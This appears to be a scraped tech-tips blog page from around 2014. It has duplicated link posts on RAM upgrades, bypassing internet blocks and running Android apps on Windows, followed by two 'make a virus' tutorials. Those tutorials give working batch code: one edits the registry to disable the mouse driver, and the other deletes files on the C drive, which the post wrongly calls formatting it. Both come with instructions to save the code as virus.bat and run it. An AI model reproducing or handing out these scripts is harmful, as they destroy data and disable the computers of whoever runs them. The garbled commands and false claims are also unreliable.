Friday, 3 January 2014

Find the right RAM upgrade for your laptop using Kingston System Specific Memory

http://dgit.in/1cqsS6R

Kingston allows you to specify your laptop model to find the exact matching RAM module, guaranteeing 100% compatibility!
Find the right RAM upgrade for your laptop using Kingston System Specific Memory

http://dgit.in/1cqsS6R

Kingston allows you to specify your laptop model to find the exact matching RAM module, guaranteeing 100% compatibility!
                                                             How to bypass internet blocks!

http://dgit.in/1cMmuLY

If you ISP or office has restricted internet access and for some reason you have to access a blocked site, here are ways you can still get access to such sites.

Warning: Do it at your own risk, we are not encouraging you to break any official rules, this article is more targeted towards accessing sites that might have country level or ISP level restrictions. Example- Lets say you want to order a Nexus 7 from US Playstore (cause its so damn cheap in US) but aren't able to cause of automatic redirection to Google India Playstore. In such cases, this guide is handy!

Sunday, 29 December 2013

Watch This Tutorial and Learn How To Install Android Apps And Game In Window OS

www.gaincafe.com/how-to-install-android-apps-and-game-in-window-os/
Watch This Tutorial and Learn How To Install Android Apps And Game In Window OS

www.gaincafe.com/how-to-install-android-apps-and-game-in-window-os/
Make A Virus That Disable Mouse

Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save this file as virus.bat

Done you just created your virus.
Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.